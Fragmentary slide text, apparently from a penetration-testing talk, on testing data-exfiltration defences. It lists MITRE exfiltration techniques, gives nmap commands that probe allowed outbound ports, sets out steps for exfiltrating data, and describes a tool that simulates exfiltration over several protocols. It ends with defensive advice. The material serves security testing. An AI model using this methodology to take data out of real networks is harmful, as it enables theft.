revolves around finding and exploiting particular vulnerability in system Or Testing security controls at current point of time Or achieve Domain Admin ;) • When attacker are exfiltrating data from victim, why cant we test same and aid customer’s before outsider exploits.
Data Encrypted • Data Transfer Size Limits • Exfiltration Over Alternative Protocol • Exfiltration Over Command and Control Channel • Exfiltration Over Other Network Medium • Exfiltration Over Physical Medium • Scheduled Transfer Ref :- https://attack.mitre.org/wiki/Exfiltration
the network • Step1: Find out what ports are allowed from inside to out • nmap –sS –Pn open.zorinaq.com • nmap –sS –Pn portquiz.net • Step2: Choose the protocol over which you want to exfiltration the data • Step 3: Choose the data you want to exfiltrate • Step4: Start exfiltration
client/server model • Simulates data exfiltration • Exfiltrate data over multiple protocols • HTTP / HTTPS • FTP / SFTP • ICMP • SMB • DNS / • DNS_Resolved • Simulates Malware or APT Traffic • Easy to Go ;)
blindly trust perimeter security tool, test them !! • Monitor the volume and frequency of data transmission by your users over email and other organizational messaging tools. • Block Unauthorized Communication Channels • Prevent Phishing Attacks and Credential Theft • Security-aware Employees